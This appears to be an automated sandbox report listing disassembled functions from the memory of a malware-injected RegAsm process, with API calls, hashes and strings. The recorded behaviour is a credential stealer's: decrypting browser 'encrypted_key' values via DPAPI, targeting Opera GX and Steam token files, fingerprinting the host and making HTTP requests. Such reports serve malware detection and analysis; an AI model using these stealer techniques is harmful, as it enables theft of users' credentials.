Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: dd094f4d55d62eea58a3954af6e6c32347fa31dd456b2504a0b5ffba1ae8a436
Instruction ID: 4cb87360d4cc9858b9bae9126dd361b9e7f070cb957ea2b410353c93073faa23
Opcode Fuzzy Hash: dd094f4d55d62eea58a3954af6e6c32347fa31dd456b2504a0b5ffba1ae8a436
Instruction Fuzzy Hash: 9321F532E40209ABDF14EB91DD41ADE7374AF41360F1044BEE950B72D0DF389A49CA58

Function 00410F51 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0041421B,Processor: ,[Hardware],00436948,00000000,TimeZone: ,00436938,00000000,Local Time: ,00436924), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,0041421B,Processor: ,[Hardware],00436948,00000000,TimeZone: ,00436938,00000000,Local Time: ,00436924,Keyboard Languages: ,00436908), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436880,?,?,?,0041421B,Processor: ,[Hardware],00436948,00000000,TimeZone: ,00436938,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436880,00000000,00000000,00000000,000000FF,?,?,?,0041421B,Processor: ,[Hardware],00436948,00000000,TimeZone: ,00436938,00000000), ref: 00410FA6

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 004162F9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416341
lstrcatA.KERNEL32(?), ref: 0041635F

Part of subcall function 00415F9A: wsprintfA.USER32 ref: 00415FE1
Part of subcall function 00415F9A: FindFirstFileA.KERNEL32(?,?), ref: 00415FF8
Part of subcall function 00415F9A: StrCmpCA.SHLWAPI(?,00436AAC), ref: 00416019
Part of subcall function 00415F9A: StrCmpCA.SHLWAPI(?,00436AB0), ref: 00416033
Part of subcall function 00415F9A: wsprintfA.USER32 ref: 0041605A
Part of subcall function 00415F9A: StrCmpCA.SHLWAPI(?,00436647), ref: 0041606E
Part of subcall function 00415F9A: wsprintfA.USER32 ref: 0041608B
Part of subcall function 00415F9A: PathMatchSpecA.SHLWAPI(?,?), ref: 004160B8
Part of subcall function 00415F9A: lstrcatA.KERNEL32(?), ref: 004160EE
Part of subcall function 00415F9A: lstrcatA.KERNEL32(?,00436AC8), ref: 00416100
Part of subcall function 00415F9A: lstrcatA.KERNEL32(?,?), ref: 00416113
Part of subcall function 00415F9A: lstrcatA.KERNEL32(?,00436ACC), ref: 00416125
Part of subcall function 00415F9A: lstrcatA.KERNEL32(?,?), ref: 00416139

Part of subcall function 00415F9A: wsprintfA.USER32 ref: 004160A2
Part of subcall function 00415F9A: FindNextFileA.KERNEL32(?,?), ref: 004162C8
Part of subcall function 00415F9A: FindClose.KERNEL32(?), ref: 004162DC

Strings

7zA, xrefs: 00416477

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: 7zA
API String ID: 153043497-175032957
Opcode ID: bc5468eb71594b395590fde63c09a3da5e5195f092b7dc41013fec04b9ed5089
Instruction ID: b3e3a05dd6e1b3f2d1f401c5eb4087b2e9cdcdc9d722114950f18d252210513d
Opcode Fuzzy Hash: bc5468eb71594b395590fde63c09a3da5e5195f092b7dc41013fec04b9ed5089
Instruction Fuzzy Hash: 9B31197280050EEFCF09EB60DC43EE8337AEB08308F0444AEB506932A1EA769B559F55

Function 00416807 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041683C

Strings

ERROR, xrefs: 0041685F
ERROR, xrefs: 00416834

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: c1618506ade923976d410a78d0118844dfd2a2f2a4ce65ec30e3f137836741db
Instruction ID: 726cad4adb7466161341e2d5928f42d3ed502d238f03c06f5594ac904ff58156
Opcode Fuzzy Hash: c1618506ade923976d410a78d0118844dfd2a2f2a4ce65ec30e3f137836741db
Instruction Fuzzy Hash: 9E014F75E00118ABCB21FB76D9469CD77A86E04308F514177BC24F3293E7B8E9498AD9

Function 0041224A Relevance: 4.5, APIs: 3, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00413DB3,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: be3f5f3ec194e1506fa54ce7dd0fcfbfff3ff427d54d4a17b13e59292d64dd5a
Instruction ID: 07042d539b9cb392da1f421894f03ac4b7e1a2d86b80db83d4b3302071e4a92c
Opcode Fuzzy Hash: be3f5f3ec194e1506fa54ce7dd0fcfbfff3ff427d54d4a17b13e59292d64dd5a
Instruction Fuzzy Hash: 2FF0B471600218ABDB24EB68DC45FEEB7BC9B44B08F00006AF645D7180EEB5DAC58B54

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 5d1f46fb138707beabd440fd8a5205b18fa244f283a7e9dc606f308aea7bae98
Instruction ID: 27e192b18a38f2f12cdae3b0b475b120c200fe1745c4f7c36bd186b6643d2323
Opcode Fuzzy Hash: 5d1f46fb138707beabd440fd8a5205b18fa244f283a7e9dc606f308aea7bae98
Instruction Fuzzy Hash: 72E08CB1200204BBE7449B99AC8DF8A76BCDB84755F100225F606D2250E6B4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,0043684F,0043684E,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: fd30662bbb0df69b7e749c14c4835a746ce06bdc28bdb211507647d3f2e04d7e
Instruction ID: f27801e8275c5d49bf7f719f28fda38a5004f758e4d98a6938de4012f210df24
Opcode Fuzzy Hash: fd30662bbb0df69b7e749c14c4835a746ce06bdc28bdb211507647d3f2e04d7e
Instruction Fuzzy Hash: B5B1ED7294011DABCF11FFA6DE425CD7775AF04308F51013AF904771A2DAB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B

Function 00416F80 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 00416FC7

Part of subcall function 00416E60: CreateThread.KERNEL32(00000000,00000000,00416D8F,?,00000000,00000000), ref: 00416EFF
Part of subcall function 00416E60: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F07

Strings

Soft\Steam\steam_tokens.txt, xrefs: 00416FD7

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 5fa3e5f5a7d99c71d5a07e024241de5809f96d492a7ce46a8d5a906dfdce2266
Instruction ID: b9e244e593406abc482e36c16cf2d8cfbf0e1e6176dab1e931287d86b5cd2df1
Opcode Fuzzy Hash: 5fa3e5f5a7d99c71d5a07e024241de5809f96d492a7ce46a8d5a906dfdce2266
Instruction Fuzzy Hash: 85012131E401196BCF00FBE6DD478CEBB74AF04358F514176FA00B7152DB78AA9A86E9

Function 00409072 Relevance: 2.7, APIs: 2, Instructions: 163stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409209
lstrlenA.KERNEL32(?), ref: 00409224

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: f612d1a5f7584d77cbc41c2542c0c1a0c4b160347301cf634e5c4eedd1fe6f07
Instruction ID: 6be2978500cdc25d267aebd012c28278f7fd55cc9f2fa240bb1124d4d1ea6045
Opcode Fuzzy Hash: f612d1a5f7584d77cbc41c2542c0c1a0c4b160347301cf634e5c4eedd1fe6f07
Instruction Fuzzy Hash: D1512E71A001199BCF01FBA5DE468DD7775AF04309F511026F500B71A2DB78AE598B99

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715

Function 0041CB82 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CB93

Part of subcall function 0041BB36: lstrlenA.KERNEL32(?,0041CBA4,0041CC46,00000000,06400000,00000003,00000000,00417548,.exe,00436C54,00436C50,00436C4C,00436C48,00436C44,00436C40,00436C3C), ref: 0041BB68
Part of subcall function 0041BB36: malloc.MSVCRT ref: 0041BB70
Part of subcall function 0041BB36: lstrcpyA.KERNEL32(00000000,?), ref: 0041BB7B

malloc.MSVCRT ref: 0041CBD0

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
